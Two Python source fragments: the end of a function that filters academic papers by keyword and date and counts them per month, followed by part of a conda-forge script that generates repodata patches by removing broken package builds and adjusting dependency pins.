return bins if not return_filtered else (bins, [])
# Remove duplicate entries (keep only the first one)
df = pd.DataFrame(data).sort_values(by="date", ascending=True)
data = df.drop_duplicates(subset="title", keep="first").to_dict("records")
dates = [dd["date"] for dd in data]
filtered = []
for paper, date in zip(data, dates):
year = int(date.split("-")[0])
if year < start_year or year > last_year:
continue
# At least one synonym per keyword needs to be in either title or
# abstract.
if filtering and filter_keys != list():
# Filter out papers which undesired terms
unwanted = False
for unwanted_key in unwanted_keys:
if unwanted_key.lower() in paper["title"].lower():
unwanted = True
if (
filter_abstract
and paper["abstract"] is not None
and unwanted_key.lower() in paper["abstract"].lower()
):
unwanted = True
if unwanted:
continue
got_keys = []
for key_term in filter_keys:
got_key = False
if not isinstance(key_term, list):
key_term = [key_term]
for key in key_term:
if key.lower() in paper["title"].lower():
got_key = True
if (
filter_abstract
and paper["abstract"] is not None
and key.lower() in paper["abstract"].lower()
):
got_key = True
got_keys.append(got_key)
if len(got_keys) != sum(got_keys):
continue
filtered.append(paper)
if len(date.split("-")) < 2:
logger.warning(
f"Paper without month {date}, randomly assigned month."
f"{paper['title']}"
)
month = np.random.choice(12)
else:
month = int(date.split("-")[1])
year_bin = year - start_year
month_bin = int(np.floor((month - 1) / (12 / bins_per_year)))
bins[year_bin * bins_per_year + month_bin] += 1
if return_filtered:
return bins, filtered
else:
return bins
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from collections import defaultdict
import copy
import json
import os
from os.path import join, isdir
import sys
import tqdm
import re
import requests
import pkg_resources
from get_license_family import get_license_family
CHANNEL_NAME = "conda-forge"
CHANNEL_ALIAS = "https://conda.anaconda.org"
SUBDIRS = (
"noarch",
"linux-64",
"linux-armv7l",
"linux-aarch64",
"linux-ppc64le",
"osx-64",
"osx-arm64",
"win-32",
"win-64",
)
REMOVALS = {
"noarch": (
"sendgrid-5.3.0-py_0.tar.bz2",
),
"linux-64": (
"airflow-with-gcp_api-1.9.0-1.tar.bz2",
"airflow-with-gcp_api-1.9.0-2.tar.bz2",
"airflow-with-gcp_api-1.9.0-3.tar.bz2",
"adios-1.13.1-py36hbecc8f4_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"compliance-checker-2.2.0-0.tar.bz2",
"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"gdk-pixbuf-2.36.9-0.tar.bz2",
"itk-4.12.0-py27_0.tar.bz2",
"itk-4.12.0-py35_0.tar.bz2",
"itk-4.12.0-py36_0.tar.bz2",
"itk-4.13.0-py27_0.tar.bz2",
"itk-4.13.0-py35_0.tar.bz2",
"itk-4.13.0-py36_0.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_1.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_1.tar.bz2",
"libtasn1-4.13-py36_0.tar.bz2",
"libgsasl-1.8.0-py36_1.tar.bz2",
"nipype-0.12.0-0.tar.bz2",
"nipype-0.12.0-py35_0.tar.bz2",
"postgis-2.4.3+9.6.8-0.tar.bz2",
"pyarrow-0.1.post-0.tar.bz2",
"pyarrow-0.1.post-1.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
"pytest-regressions-1.0.1-0.tar.bz2",
"rapidpy-2.5.2-py36_0.tar.bz2",
"smesh-8.3.0b0-1.tar.bz2",
"statuspage-0.3.3-0.tar.bz2",
"statuspage-0.4.0-0.tar.bz2",
"statuspage-0.4.1-0.tar.bz2",
"statuspage-0.5.0-0.tar.bz2",
"statuspage-0.5.1-0.tar.bz2",
"tokenize-rt-2.0.1-py27_0.tar.bz2",
"vaex-core-0.4.0-py27_0.tar.bz2",
),
"osx-64": (
"adios-1.13.1-py36hbecc8f4_0.tar.bz2",
"airflow-with-gcp_api-1.9.0-1.tar.bz2",
"airflow-with-gcp_api-1.9.0-2.tar.bz2",
"arpack-3.6.1-blas_openblash1f444ea_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"compliance-checker-2.2.0-0.tar.bz2",
"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_1.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_1.tar.bz2",
"flask-rest-orm-0.5.0-py35_0.tar.bz2",
"flask-rest-orm-0.5.0-py36_0.tar.bz2",
"itk-4.12.0-py27_0.tar.bz2",
"itk-4.12.0-py35_0.tar.bz2",
"itk-4.12.0-py36_0.tar.bz2",
"itk-4.13.0-py27_0.tar.bz2",
"itk-4.13.0-py35_0.tar.bz2",
"itk-4.13.0-py36_0.tar.bz2",
"lammps-2018.03.16-.tar.bz2",
"libtasn1-4.13-py36_0.tar.bz2",
"mpb-1.6.2-1.tar.bz2",
"nipype-0.12.0-0.tar.bz2",
"nipype-0.12.0-py35_0.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
"pytest-regressions-1.0.1-0.tar.bz2",
"reentry-1.1.0-py27_0.tar.bz2",
"resampy-0.2.0-py27_0.tar.bz2",
"statuspage-0.3.3-0.tar.bz2",
"statuspage-0.4.0-0.tar.bz2",
"statuspage-0.4.1-0.tar.bz2",
"statuspage-0.5.0-0.tar.bz2",
"statuspage-0.5.1-0.tar.bz2",
"sundials-3.1.0-blas_openblash0edd121_202.tar.bz2",
"vlfeat-0.9.20-h470a237_2.tar.bz2",
"xtensor-python-0.19.1-h3e44d54_0.tar.bz2",
),
"osx-arm64": (
),
"win-32": (
"compliance-checker-2.2.0-0.tar.bz2",
"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"glpk-4.59-py27_vc9_0.tar.bz2",
"glpk-4.59-py34_vc10_0.tar.bz2",
"glpk-4.59-py35_vc14_0.tar.bz2",
"glpk-4.60-py27_vc9_0.tar.bz2",
"glpk-4.60-py34_vc10_0.tar.bz2",
"glpk-4.60-py35_vc14_0.tar.bz2",
"glpk-4.61-py27_vc9_0.tar.bz2",
"glpk-4.61-py35_vc14_0.tar.bz2",
"glpk-4.61-py36_0.tar.bz2",
"libspatialindex-1.8.5-py27_0.tar.bz2",
"liknorm-1.3.7-py27_1.tar.bz2",
"liknorm-1.3.7-py35_1.tar.bz2",
"liknorm-1.3.7-py36_1.tar.bz2",
"nlopt-2.4.2-0.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
),
"win-64": (
"compliance-checker-2.2.0-0.tar.bz2",
"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"glpk-4.59-py27_vc9_0.tar.bz2",
"glpk-4.59-py34_vc10_0.tar.bz2",
"glpk-4.59-py35_vc14_0.tar.bz2",
"glpk-4.60-py27_vc9_0.tar.bz2",
"glpk-4.60-py34_vc10_0.tar.bz2",
"glpk-4.60-py35_vc14_0.tar.bz2",
"glpk-4.61-py27_vc9_0.tar.bz2",
"glpk-4.61-py35_vc14_0.tar.bz2",
"glpk-4.61-py36_0.tar.bz2",
"itk-4.13.0-py35_0.tar.bz2",
"libspatialindex-1.8.5-py27_0.tar.bz2",
"liknorm-1.3.7-py27_1.tar.bz2",
"liknorm-1.3.7-py35_1.tar.bz2",
"liknorm-1.3.7-py36_1.tar.bz2",
"nlopt-2.4.2-0.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
"pytest-regressions-1.0.1-0.tar.bz2",
),
}
OPERATORS = ["==", ">=", "<=", ">", "<", "!="]
OSX_SDK_FIXES = {
'nodejs-12.8.0-hec2bf70_1': '10.10',
'nodejs-12.1.0-h6de7cb9_1': '10.10',
'nodejs-12.3.1-h6de7cb9_0': '10.10',
'nodejs-12.9.0-hec2bf70_0': '10.10',
'nodejs-12.9.1-hec2bf70_0': '10.10',
'nodejs-12.7.0-hec2bf70_1': '10.10',
'nodejs-12.10.0-hec2bf70_0': '10.10',
'nodejs-12.4.0-h6de7cb9_0': '10.10',
'nodejs-12.11.1-hec2bf70_0': '10.10',
'nodejs-12.7.0-h6de7cb9_0': '10.10',
'nodejs-12.3.0-h6de7cb9_0': '10.10',
'nodejs-10.16.3-hec2bf70_0': '10.10',
'nodejs-12.12.0-hfddbe92_0': '10.10',
'nodejs-12.8.1-hec2bf70_0': '10.10',
'javafx-sdk-11.0.4-h6dcaf97_1': '10.11',
'javafx-sdk-12.0.2-h6dcaf97_1': '10.11',
'javafx-sdk-12.0.2-h6dcaf97_0': '10.11',
'javafx-sdk-11.0.4-h6dcaf97_0': '10.11',
'qt-5.12.1-h1b46049_0': '10.12',
'qt-5.9.7-h8cf7e54_3': '10.12',
'qt-5.9.7-h93ee506_0': '10.12',
'qt-5.9.7-h93ee506_1': '10.12',
'qt-5.12.5-h1b46049_0': '10.12',
'qt-5.9.7-h93ee506_2': '10.12',
'openmpi-mpicxx-4.0.1-h6052eea_2': '10.12',
'openmpi-mpicxx-4.0.1-h6052eea_1': '10.12',
'openmpi-mpicxx-4.0.1-h6052eea_0': '10.12',
'openmpi-mpicxx-4.0.1-hc9558a2_2': '10.12',
'openmpi-mpicxx-4.0.1-hc9558a2_0': '10.12',
'openmpi-mpicxx-4.0.1-hc9558a2_1': '10.12',
'freecad-0.18.3-py37h4764a83_2': '10.12',
'freecad-0.18.3-py37hc453731_1': '10.12',
'freecad-0.18.4-py37hab2b3aa_1': '10.12',
'freecad-0.18.4-py37hab2b3aa_0': '10.12',
'openmpi-mpicc-4.0.1-h24e1f75_1': '10.12',
'openmpi-mpicc-4.0.1-h24e1f75_2': '10.12',
'openmpi-mpicc-4.0.1-h24e1f75_0': '10.12',
'openmpi-mpicc-4.0.1-h516909a_0': '10.12',
'openmpi-mpicc-4.0.1-h516909a_1': '10.12',
'openmpi-mpicc-4.0.1-h516909a_2': '10.12',
'openmpi-mpifort-4.0.1-h939af09_0': '10.12',
'openmpi-mpifort-4.0.1-h6ad152f_2': '10.12',
'openmpi-mpifort-4.0.1-h939af09_2': '10.12',
'openmpi-mpifort-4.0.1-h939af09_1': '10.12',
'openmpi-mpifort-4.0.1-he991be0_0': '10.12',
'openmpi-mpifort-4.0.1-he991be0_1': '10.12',
'openmpi-mpifort-4.0.1-he991be0_2': '10.12',
'reaktoro-1.0.7-py37h99eb986_0': '10.12',
'reaktoro-1.0.7-py37h99eb986_1': '10.12',
'reaktoro-1.0.7-py36h99eb986_0': '10.12',
'reaktoro-1.0.7-py36h99eb986_1': '10.12',
'pyqt-5.12.3-py38he22c54c_1': '10.12',
'pyqt-5.9.2-py37h2a560b1_0': '10.12',
'pyqt-5.12.3-py36he22c54c_1': '10.12',
'pyqt-5.9.2-py27h2a560b1_4': '10.12',
'pyqt-5.9.2-py27h2a560b1_1': '10.12',
'pyqt-5.9.2-py37h2a560b1_4': '10.12',
'pyqt-5.9.2-py36h2a560b1_3': '10.12',
'pyqt-5.9.2-py27h2a560b1_2': '10.12',
'pyqt-5.9.2-py36h2a560b1_1': '10.12',
'pyqt-5.12.3-py27h2a560b1_0': '10.12',
'pyqt-5.12.3-py37h2a560b1_0': '10.12',
'pyqt-5.12.3-py27he22c54c_0': '10.12',
'pyqt-5.12.3-py27he22c54c_1': '10.12',
'pyqt-5.9.2-py37h2a560b1_2': '10.12',
'pyqt-5.9.2-py37h2a560b1_1': '10.12',
'pyqt-5.9.2-py36h2a560b1_0': '10.12',
'pyqt-5.9.2-py36h2a560b1_4': '10.12',
'pyqt-5.9.2-py27h2a560b1_0': '10.12',
'pyqt-5.9.2-py37h2a560b1_3': '10.12',
'pyqt-5.12.3-py38he22c54c_0': '10.12',
'pyqt-5.9.2-py27h2a560b1_3': '10.12',
'pyqt-5.9.2-py36h2a560b1_2': '10.12',
'pyqt-5.12.3-py37he22c54c_0': '10.12',
'pyqt-5.12.3-py36he22c54c_0': '10.12',
'pyqt-5.12.3-py37he22c54c_1': '10.12',
'pyqt-5.12.3-py36h2a560b1_0': '10.12',
'ldas-tools-al-2.6.3-hf543496_0': '10.12',
'ldas-tools-al-2.6.3-hf543496_1': '10.12',
'ldas-tools-al-2.6.4-h4f290e7_1': '10.12',
'ldas-tools-al-2.6.4-h4f290e7_0': '10.12',
'openmpi-4.0.1-ha90c164_2': '10.12',
'openmpi-4.0.1-ha90c164_0': '10.12',
'openmpi-4.0.1-hfcebdee_2': '10.12',
'openmpi-4.0.1-ha90c164_1': '10.12',
'openmpi-4.0.1-hc99cbb1_1': '10.12',
'openmpi-4.0.1-hc99cbb1_0': '10.12',
'openmpi-4.0.1-hc99cbb1_2': '10.12',
}
def _add_removals(instructions, subdir):
r = requests.get(
"https://conda.anaconda.org/conda-forge/"
"label/broken/%s/repodata.json" % subdir
)
if r.status_code != 200:
r.raise_for_status()
data = r.json()
currvals = list(REMOVALS.get(subdir, []))
for pkg_name in data["packages"]:
currvals.append(pkg_name)
instructions["remove"].extend(tuple(set(currvals)))
def _gen_patch_instructions(index, new_index, subdir):
instructions = {
"patch_instructions_version": 1,
"packages": defaultdict(dict),
"revoke": [],
"remove": [],
}
_add_removals(instructions, subdir)
# diff all items in the index and put any differences in the instructions
for fn in index:
assert fn in new_index
# replace any old keys
for key in index[fn]:
assert key in new_index[fn], (key, index[fn], new_index[fn])
if index[fn][key] != new_index[fn][key]:
instructions['packages'][fn][key] = new_index[fn][key]
# add any new keys
for key in new_index[fn]:
if key not in index[fn]:
instructions['packages'][fn][key] = new_index[fn][key]
return instructions
def has_dep(record, name):
return any(dep.split(' ')[0] == name for dep in record.get('depends', ()))
def get_python_abi(version, subdir, build=None):
if build is not None:
m = re.match(".*py\d\d", build)
if m:
version = f"{m.group()[-2]}.{m.group()[-1]}"
if version.startswith("2.7"):
if subdir.startswith("linux"):
return "cp27mu"
return "cp27m"
elif version.startswith("2.6"):
if subdir.startswith("linux"):
return "cp26mu"
return "cp26m"
elif version.startswith("3.4"):
return "cp34m"
elif version.startswith("3.5"):
return "cp35m"
elif version.startswith("3.6"):
return "cp36m"
elif version.startswith("3.7"):
return "cp37m"
elif version.startswith("3.8"):
return "cp38"
elif version.startswith("3.9"):
return "cp39"
return None
# Workaround for https://github.com/conda/conda-build/pull/3868
def remove_python_abi(record):
if record['name'] in ['python', 'python_abi', 'pypy']:
return
if not has_dep(record, 'python_abi'):
return
depends = record.get('depends', [])
record['depends'] = [dep for dep in depends if dep.split(" ")[0] != "python_abi"]
changes = set([])
def add_python_abi(record, subdir):
record_name = record['name']
# Make existing python and python-dependent packages conflict with pypy
if record_name == "python" and not record['build'].endswith("pypy"):
version = record['version']
new_constrains = record.get('constrains', [])
python_abi = get_python_abi(version, subdir)
new_constrains.append(f"python_abi * *_{python_abi}")
record['constrains'] = new_constrains
return
if has_dep(record, 'python') and not has_dep(record, 'pypy') and not has_dep(record, 'python_abi'):
python_abi = None
new_constrains = record.get('constrains', [])
build = record["build"]
ver_strict_found = False
ver_relax_found = False
for dep in record.get('depends', []):
dep_split = dep.split(' ')
if dep_split[0] == 'python':
if len(dep_split) == 3:
continue
if len(dep_split) == 1:
continue
elif dep_split[1] == "<3":
python_abi = get_python_abi("2.7", subdir, build)
elif dep_split[1].startswith(">="):
m = cb_pin_regex.match(dep_split[1])
if m == None:
python_abi = get_python_abi("", subdir, build)
else:
lower = pad_list(m.group("lower").split("."), 2)[:2]
upper = pad_list(m.group("upper").split("."), 2)[:2]
if lower[0] == upper[0] and int(lower[1]) + 1 == int(upper[1]):
python_abi = get_python_abi(m.group("lower"), subdir, build)
else:
python_abi = get_python_abi("", subdir, build)
else:
python_abi = get_python_abi(dep_split[1], subdir, build)
if python_abi:
new_constrains.append(f"python_abi * *_{python_abi}")
changes.add((dep, f"python_abi * *_{python_abi}"))
ver_strict_found = True
else:
ver_relax_found = True
if not ver_strict_found and ver_relax_found:
new_constrains.append("pypy <0a0")
record['constrains'] = new_constrains
def _gen_new_index(repodata, subdir):
"""Make any changes to the index by adjusting the values directly.
This function returns the new index with the adjustments.
Finally, the new and old indices are then diff'ed to produce the repo
data patches.
"""
index = copy.deepcopy(repodata["packages"])
# deal with windows vc features
if subdir.startswith("win-"):
python_vc_deps = {
'2.6': 'vc 9.*',
'2.7': 'vc 9.*',
'3.3': 'vc 10.*',
'3.4': 'vc 10.*',
'3.5': 'vc 14.*',
'3.6': 'vc 14.*',
'3.7': 'vc 14.*',
}
for fn, record in index.items():
record_name = record['name']
if record_name == 'python':
# remove the track_features key
if 'track_features' in record:
record['track_features'] = None
# add a vc dependency
if not any(d.startswith('vc') for d in record['depends']):
depends = record['depends']
depends.append(python_vc_deps[record['version'][:3]])
record['depends'] = depends
elif 'vc' in record.get('features', ''):
# remove vc from the features key
vc_version = _extract_and_remove_vc_feature(record)
if vc_version:
# add a vc dependency
if not any(d.startswith('vc') for d in record['depends']):
depends = record['depends']
depends.append('vc %d.*' % vc_version)
record['depends'] = depends
proj4_fixes = {"cartopy", "cdo", "gdal", "libspatialite", "pynio", "qgis"}
for fn, record in index.items():
record_name = record["name"]
if record.get('timestamp', 0) < 1604417730000:
if subdir == 'noarch':
remove_python_abi(record)
else:
add_python_abi(record, subdir)
if "license" in record and "license_family" not in record and record["license"]:
family = get_license_family(record["license"])
if family:
record['license_family'] = family
# remove dependency from constrains for twisted
if record_name == "twisted":
new_constrains = [dep for dep in record.get('constrains', ())
if not dep.startswith("pyobjc-framework-cococa")]
if new_constrains != record.get('constrains', ()):
record['constrains'] = new_constrains
if record_name == "starlette-base":
if not any(dep.split(' ')[0] == "starlette" for dep in record.get('constrains', ())):
if 'constrains' in record:
record['constrains'].append(f"starlette {record["version"]}")
else:
record['constrains'] = [f"starlette {record["version"]}"]
if record_name == "pytorch" and record.get('timestamp', 0) < 1610297816658:
# https://github.com/conda-forge/pytorch-cpu-feedstock/issues/29
if not any(dep.split(' ')[0] == 'typing_extensions'
for dep in record.get('depends', ())):
if 'depends' in record:
record['depends'].append("typing_extensions")
else:
record['depends'] = ["typing_extensions"]
if record_name == "ipython" and record.get('timestamp', 0) < 1609621539000:
# https://github.com/conda-forge/ipython-feedstock/issues/127
if any(dep.split(' ')[0] == "jedi" for dep in record.get('depends', ())):
record['depends'].append('jedi <0.18')
if record_name == "kartothek" and record.get('timestamp', 0) < 1611565264000:
# https://github.com/conda-forge/kartothek-feedstock/issues/36
if "zstandard" in record['depends']:
i = record['depends'].index('zstandard')
record['depends'][i] = 'zstandard <0.15'
if record_name == "gitdb" and record['version'].startswith('4.0.') and 'smmap >=3.0.1' in record['depends']:
i = record['depends'].index('smmap >=3.0.1')
record['depends'][i] = 'smmap >=3.0.1,<4'
if record_name == "arrow-cpp":
if not any(dep.split(' ')[0] == "arrow-cpp-proc" for dep in record.get('constrains', ())):
if 'constrains' in record:
record['constrains'].append("arrow-cpp-proc * cpu")
else:
record['constrains'] = ["arrow-cpp-proc * cpu"]
if "aws-sdk-cpp" in record['depends']:
i = record['depends'].index('aws-sdk-cpp')
record['depends'][i] = 'aws-sdk-cpp 1.7.164'
if record_name == "pyarrow":
if not any(dep.split(' ')[0] == "arrow-cpp-proc" for dep in record.get('constrains', ())):
if 'constrains' in record:
record['constrains'].append("arrow-cpp-proc * cpu")
else:
record['constrains'] = ["arrow-cpp-proc * cpu"]
if record_name == "kartothek":
if record["version"] in ["3.15.0", "3.15.1", "3.16.0"] \
and "pyarrow >=0.13.0,!=0.14.0,<2" in record["depends"]:
i = record["depends"].index("pyarrow >=0.13.0,!=0.14.0,<2")
record["depends"][i] = "pyarrow >=0.17.1,<2"
# distributed <2.11.0 does not work with msgpack-python >=1.0
# newer versions of distributed require at least msgpack-python >=0.6.0
# so we can fix cases where msgpack-python is unbounded
# https://github.com/conda-forge/distributed-feedstock/pull/114
if record_name == 'distributed':
if 'msgpack-python' in record['depends']:
i = record['depends'].index('msgpack-python')
record['depends'][i] = 'msgpack-python <1.0.0'
# python-language-server <=0.31.9 requires pyflakes <2.2.2
# included explicitly in 0.31.10+
# https://github.com/conda-forge/python-language-server-feedstock/pull/50
version = record['version']
if record_name == 'python-language-server':
pversion = pkg_resources.parse_version(version)
v0_31_9 = pkg_resources.parse_version('0.31.9')
if pversion <= v0_31_9 and 'pyflakes >=1.6.0' in record['depends']:
i = record['depends'].index('pyflakes >=1.6.0')
record['depends'][i] = 'pyflakes >=1.6.0,<2.2.0'
# aioftp >=0.17.0 requires python >=3.7
# aioftp 0.17.x was incorrectly built with 3.6 support
# https://github.com/conda-forge/aioftp-feedstock/pull/12
version = record['version']
if record_name == 'aioftp':
pversion = pkg_resources.parse_version(version)
base_version = pkg_resources.parse_version('0.17.0')
max_version = pkg_resources.parse_version('0.17.2')
if base_version <= pversion <= max_version and 'python >=3.6' in record['depends']:
i = record['depends'].index('python >=3.6')
record['depends'][i] = 'python >=3.7'
# numpydoc >=1.0.0 requires python >=3.5
# https://github.com/conda-forge/numpydoc-feedstock/pull/14
version = record['version']
if record_name == 'numpydoc':
pversion = pkg_resources.parse_version(version)
v1_0_0 = pkg_resources.parse_version('1.0.0')
v1_1_0 = pkg_resources.parse_version('1.1.0')
if v1_0_0 <= pversion <= v1_1_0 and 'python' in record['depends']:
i = record['depends'].index('python')
record['depends'][i] = 'python >=3.5'
# pip >=21 requires python >=3.6 but the first build has >=3
# https://github.com/conda-forge/pip-feedstock/pull/68
if record_name == 'pip':
if record['version'] == "21.0" and record['build'] == "pyhd8ed1ab_0":
i = record['depends'].index('python >=3')
record['depends'][i] = 'python >=3.6'
# fix deps with wrong names
if record_name in proj4_fixes:
_rename_dependency(fn, record, "proj.4", "proj4")
if record_name == "airflow-with-async":
_rename_dependency(fn, record, "evenlet", "eventlet")
if record_name == "iris":
_rename_dependency(fn, record, "nc_time_axis", "nc-time-axis")
if (record_name == "r-base" and
not any(dep.startswith("_r-mutex ")
for dep in record["depends"])):
depends = record["depends"]
depends.append("_r-mutex 1.* anacondar_1")
record["depends"] = depends
if record_name == "gcc_impl_{}".format(subdir):
_relax_exact(fn, record, "binutils_impl_{}".format(subdir))
deps = record.get("depends", ())
if "ntl" in deps and record_name != "sage":
_rename_dependency(fn, record, "ntl", "ntl 10.3.0")
if "libiconv >=1.15,<1.16.0a0" in deps:
_pin_looser(fn, record, "libiconv", upper_bound="1.17.0")
if 're2' in deps and record.get('timestamp', 0) < 1588349339243:
_rename_dependency(fn, record, "re2", "re2 <2020.05.01")
if 'libffi' in deps and record.get('timestamp', 0) < 1605980936031:
_rename_dependency(fn, record, "libffi", "libffi <3.3.0.a0")
if 'libffi >=3.2.1,<4.0a0' in deps and record.get('timestamp', 0) < 1605980936031:
_pin_stricter(fn, record, "libffi", "x.x")
_relax_libssh2_1_x_pinning(fn, record)
if any(dep.startswith("gf2x") for dep in deps):
_pin_stricter(fn, record, "gf2x", "x.x")
if any(dep.startswith("libnetcdf >=4.7.3") for dep in deps):
_pin_stricter(fn, record, "libnetcdf", "x.x.x.x")
if any(dep.startswith("libarchive >=3.3") for dep in deps):
_pin_looser(fn, record, "libarchive", upper_bound="3.6.0")
# fix only packages built before the run_exports was corrected.
if any(dep == "libflang" or dep.startswith("libflang >=5.0.0") for dep in deps) and record.get('timestamp', 0) < 1611789153000:
record["depends"].append("libflang <6.0.0.a0")
if any(dep.startswith("libignition-") or dep == 'libsdformat' for dep in deps):
for dep_idx, _ in enumerate(deps):
dep = record['depends'][dep_idx]
if dep.startswith('libignition-'):
_pin_looser(fn, record, dep.split(" ")[0], max_pin="x")
if dep.startswith('libsdformat '):
_pin_looser(fn, record, dep.split(" ")[0], max_pin="x")
# this doesn't seem to match the _pin_looser or _pin_stricter patterns
# nor _replace_pin
if record_name == "jedi" and record.get("timestamp", 0) < 1592619891258:
for i, dep in enumerate(record["depends"]):
if dep.startswith("parso") and "<" not in dep:
_dep_parts = dep.split(" ")
_dep_parts[1] = _dep_parts[1] + ",<0.8.0"
record["depends"][i] = " ".join(_dep_parts)
# FIXME: disable patching-out blas_openblas feature
# because hotfixes are not applied to gcc7 label
# causing inconsistent behavior
# if (record_name == "blas" and
# record["track_features"] == "blas_openblas"):
# instructions["packages"][fn]["track_features"] = None
# if "features" in record:
# if "blas_openblas" in record["features"]:
# # remove blas_openblas feature
# instructions["packages"][fn]["features"] = _extract_feature(
# record, "blas_openblas")
# if not any(d.startswith("blas ") for d in record["depends"]):
# depends = record['depends']
# depends.append("blas 1.* openblas")
# instructions["packages"][fn]["depends"] = depends
if any(dep.startswith("zstd >=1.4") for dep in deps):
_pin_looser(fn, record, "zstd", max_pin="x.x")
# We pin MPI packages loosely so as to rely on their ABI compatibility
if any(dep.startswith("openmpi >=4.0") for dep in deps):
_pin_looser(fn, record, "openmpi", upper_bound="5.0")
if any(dep.startswith("mpich >=3.3") for dep in deps):
_pin_looser(fn, record, "mpich", upper_bound="4.0")
_replace_pin('libunwind >=1.2.1,<1.3.0a0', 'libunwind >=1.2.1,<2.0.0a0', deps, record)
_replace_pin('snappy >=1.1.7,<1.1.8.0a0', 'snappy >=1.1.7,<2.0.0.0a0', deps, record)
_replace_pin('ncurses >=6.1,<6.2.0a0', 'ncurses >=6.1,<6.3.0a0', deps, record)
_replace_pin('abseil-cpp', 'abseil-cpp =20190808', deps, record)
if record_name not in ["blas", "libblas", "libcblas", "liblapack",
"liblapacke", "lapack", "blas-devel"]:
_replace_pin('liblapack >=3.8.0,<3.9.0a0', 'liblapack >=3.8.0,<4.0.0a0', deps, record)
_replace_pin('liblapacke >=3.8.0,<3.9.0a0', 'liblapacke >=3.8.0,<4.0.0a0', deps, record)
# Filter by timestamp as pythia8 also contains python bindings that shouldn't be pinned
if 'pythia8' in deps and record.get('timestamp', 0) < 1584264455759:
i = record['depends'].index('pythia8')
record['depends'][i] = 'pythia8 >=8.240,<8.300.0a0'
# remove features for openjdk and rb2
if ("track_features" in record and
record['track_features'] is not None):
for feat in record["track_features"].split():
if feat.startswith(("rb2", "openjdk")):
record["track_features"] = _extract_track_feature(
record, feat)
llvm_pkgs = ["libclang", "clang", "clang-tools", "llvm", "llvm-tools", "llvmdev"]
for llvm in ["libllvm8", "libllvm9"]:
if any(dep.startswith(llvm) for dep in deps):
if record_name not in llvm_pkgs:
_relax_exact(fn, record, llvm, max_pin="x.x")
else:
_relax_exact(fn, record, llvm, max_pin="x.x.x")
if record_name in llvm_pkgs:
new_constrains = record.get('constrains', [])
version = record["version"]
for pkg in llvm_pkgs:
if record_name == pkg:
continue
if pkg in new_constrains:
del new_constrains[pkg]
if any(constraint.startswith(f"{pkg} ") for constraint in new_constrains):
continue
new_constrains.append(f'{pkg} {version}.*')
record['constrains'] = new_constrains
# make sure the libgfortran version is bound from 3 to 4 for osx
if subdir == "osx-64":
_fix_libgfortran(fn, record)
_fix_libcxx(fn, record)
full_pkg_name = fn.replace('.tar.bz2', '')
if full_pkg_name in OSX_SDK_FIXES:
_set_osx_virt_min(fn, record, OSX_SDK_FIXES[full_pkg_name])
# make old binutils packages conflict with the new sysroot packages
# that have renamed the sysroot from conda_cos6 or conda_cos7 to just
# conda
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"binutils", "binutils_impl_" + subdir, "ld_impl_" + subdir]
and record.get('timestamp', 0) < 1589953178153 # 2020-05-20
):
new_constrains = record.get('constrains', [])
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# make sure the old compilers conflict with the new sysroot packages
# and they only use libraries from the old compilers
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"gcc_impl_" + subdir, "gxx_impl_" + subdir, "gfortran_impl_" + subdir]
and record['version'] in ['5.4.0', '7.2.0', '7.3.0', '8.2.0']
):
new_constrains = record.get('constrains', [])
for pkg in ["libgcc-ng", "libstdcxx-ng", "libgfortran", "libgomp"]:
new_constrains.append("{} 5.4.*|7.2.*|7.3.*|8.2.*|9.1.*|9.2.*".format(pkg))
new_constrains.append("binutils_impl_" + subdir + " <2.34")
